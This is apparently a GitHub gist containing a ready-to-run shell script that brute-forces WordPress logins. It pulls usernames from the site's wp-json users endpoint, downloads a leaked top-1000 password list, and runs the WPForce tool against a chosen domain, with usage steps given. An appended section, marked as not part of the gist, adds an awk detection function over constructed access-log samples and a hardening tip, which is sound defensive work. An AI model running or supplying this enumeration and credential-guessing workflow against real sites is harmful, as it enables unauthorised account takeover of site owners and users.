Last active: July 1, 2024 18:01
Gist: avilum/3d660747541ab128fe568eb49f8b64ba
Bruteforce WordPress Website Using the WP-JSON Users API, With the Top 1000 Common Passwords
#!/bin/sh
#
# This file can be saved as 'bruteforce_wordpress_users.sh'
#
# Requirements:
# - python2 (with requests)
# - jq
# - wget
# - WPForce
# 1. Cloning WPForce:
# git clone https://github.com/n00py/WPForce.git && cd ./WPForce
# 2. Install Requests:
# python2 -m pip install requests (or pip install requests)
#
# Usage:
# 1. Save this file as "bruteforce_wordpress_users.sh" and chmod +x to allow script execution.
# 2. Run:
# WP_DOMAIN=wordpress.org ./bruteforce_wordpress_users.sh
#
# Defining the URLs
BASE_URL="https://${WP_DOMAIN:='wordpress.org'}/"
USERS_URL="$BASE_URL/wp-json/wp/v2/users"
# Getting the users from the WP-JSON REST API
wget -q -O- $USERS_URL | jq '.[] | .slug' > usr.txt
# Getting the top 1k used passwords (leaked)
wget -q -O- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt > pwd.txt
# Run The Scan.
python2 wpforce.py -i $(pwd)/usr.txt -w $(pwd)/pwd.txt -u $BASE_URL
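As an added defensive counterpart (not part of the gist), the enumerate-then-guess workflow above leaves a recognizable footprint in a web server access log: one GET to /wp-json/wp/v2/users from a client, followed by a burst of credential POSTs from the same client. The shell function below flags source IPs matching that pattern over constructed sample log lines; the log lines, IP addresses, user agents and the threshold value are all assumptions.

```shell
#!/bin/sh
# Added detection example, not part of the gist: flag client IPs that first
# enumerate accounts through the public /wp-json/wp/v2/users endpoint and then
# send repeated credential POSTs, the access-log footprint of the workflow
# above. Needs only awk and sort.

# Constructed sample lines in combined log format (not a real capture):
# 203.0.113.7 enumerates then guesses 4 times; 198.51.100.23 fetches the
# author list once and logs in once; 192.0.2.50 guesses without enumerating.
LOG_SAMPLE=$(cat <<'EOF'
203.0.113.7 - - [01/Jul/2024:18:01:02 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 1432 "-" "Wget/1.21"
203.0.113.7 - - [01/Jul/2024:18:01:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3812 "-" "python-requests/2.25"
203.0.113.7 - - [01/Jul/2024:18:01:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3812 "-" "python-requests/2.25"
203.0.113.7 - - [01/Jul/2024:18:01:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3812 "-" "python-requests/2.25"
203.0.113.7 - - [01/Jul/2024:18:01:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.25"
198.51.100.23 - - [01/Jul/2024:18:02:10 +0000] "GET /wp-json/wp/v2/users?per_page=100 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.23 - - [01/Jul/2024:18:02:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.50 - - [01/Jul/2024:18:03:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400 "-" "-"
192.0.2.50 - - [01/Jul/2024:18:03:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400 "-" "-"
EOF
)

# usage: flag_enum_then_bruteforce THRESHOLD < access.log
# Prints one line per IP that enumerated users AND sent >= THRESHOLD credential
# POSTs (wp-login.php or xmlrpc.php); an IP doing only one of the two is silent.
flag_enum_then_bruteforce() {
    awk -v thr="${1:-3}" '
        # Combined format after field splitting: $1 = client IP,
        # $6 = method with its leading quote, $7 = request target.
        $6 == "\"GET"  && $7 ~ /^\/wp-json\/wp\/v2\/users/ { enum[$1] = 1 }
        $6 == "\"POST" && $7 ~ /^\/(wp-login|xmlrpc)\.php/ { posts[$1]++ }
        END {
            for (ip in enum)
                if (posts[ip] + 0 >= thr)
                    printf "%s enumerated users via wp-json, then %d credential POSTs\n", ip, posts[ip]
        }
    ' | sort
}

# Number of flagged IPs for a given threshold, for alerting and tests.
count_flagged() {
    printf '%s\n' "$LOG_SAMPLE" | flag_enum_then_bruteforce "$1" | wc -l | tr -d ' '
}

printf '%s\n' "$LOG_SAMPLE" | flag_enum_then_bruteforce 3
```

Requiring authentication for the users route (a web server rule on /wp-json/wp/v2/users, or a plugin using WordPress's rest_endpoints filter) removes the enumeration step this workflow depends on, so the login burst has to target guessed rather than known usernames.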